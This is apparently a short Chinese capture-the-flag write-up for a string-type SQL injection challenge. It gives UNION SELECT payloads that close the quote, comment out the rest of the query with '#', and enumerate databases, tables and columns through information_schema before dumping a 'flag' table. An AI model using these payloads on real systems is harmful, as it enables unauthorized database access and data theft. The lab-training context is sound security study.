题目描述:
输入1试试
查询列数
注意为字符型注入,所以我们要在末尾加#符合语法规范
确定为两列,接下来同整数型注入一样,但是要注意闭合引号
查询数据库名
-1' union select 1,group_concat(schema_name) from information_schema.schemata#
查询表名
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#
查询列名
-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' && table_name='flag'#
查询flag表中的flag字段
-1' union select 1, group_concat(flag) from flag#